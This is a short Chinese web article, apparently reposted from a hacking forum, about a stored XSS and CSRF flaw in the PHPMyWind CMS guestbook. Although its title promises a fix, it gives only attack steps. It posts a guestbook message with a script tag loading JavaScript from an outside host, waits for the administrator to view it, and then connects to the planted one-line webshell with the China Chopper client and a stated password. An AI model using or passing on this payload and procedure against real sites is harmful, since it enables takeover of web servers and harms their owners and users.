phpmywind留言板xss & csrf漏洞及修复 - 网站安全-自学php网

主页 > 后端 > 网站安全 >

phpmywind留言板xss & csrf漏洞及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 14:11 作者：阅读:次

[导读] 这个漏洞在法客论坛公布的，我也发一下。漏洞利用条件留言代码scriptsrc=http:// www.2cto.com /admin/Inc/mywind.js/script接下来就是等了这个是个新出的 cms 管理员肯定会去猛看留言每天访问 cas...

这个漏洞在法客论坛公布的，我也发一下。

漏洞利用条件

留言代码

<script src=”http:// www.2cto.com /admin/Inc/mywind.js”></script>

接下来就是等了这个是个新出的 cms 管理员肯定会去猛看留言每天访问 case.php

http://www.2cto.com /case.php

然后等待这个页面变空白

管理员后台点击留言板就会变空白然后就一句话

然后菜刀一句话连接密码： sex()

这样就可以了

摘自 http://madman.in/madman5/365.html

QQ空间存储型XSS漏洞（组合利用） - 网站安全 -

actcms网站管理系统漏洞0day - 网站安全 - 自学ph

最新评论

加载更多~~

添加评论

更多文章推荐

新浪邮件正文富文本过滤不严格可插入任意标签 2015-04-17
巧用Norton8来修复你的坏硬盘 - Windows操作系统 - 2015-04-17
pGB 2.12 kommentar.php SQL注射缺陷及修复 - 网站安全 2015-04-17
我如何侵入医院的计算机(分析安全措施的必要性 2015-04-17
Stunnel加密通道的架设指南 - Windows操作系统 - 自学 2015-04-17
关于当前安全设置不允许下载文件的解决 - Wind 2015-04-17
MYRE Real Estate Mobile 2012多个缺陷 - 网站安全 - 自学 2015-04-17
当当网某业务静态SQL注入 - 网站安全 - 自学php 2015-04-17
内核之旅解开系统神秘的面纱 - Windows操作系统 2015-04-17
批量添加域用户 - Windows操作系统 - 自学php 2015-04-17

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习，以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明：本站所有视频，教程都由网友上传，站长收集和分享给大家学习使用，如由牵扯版权问题请联系站长邮箱904561283@qq.com



添加评论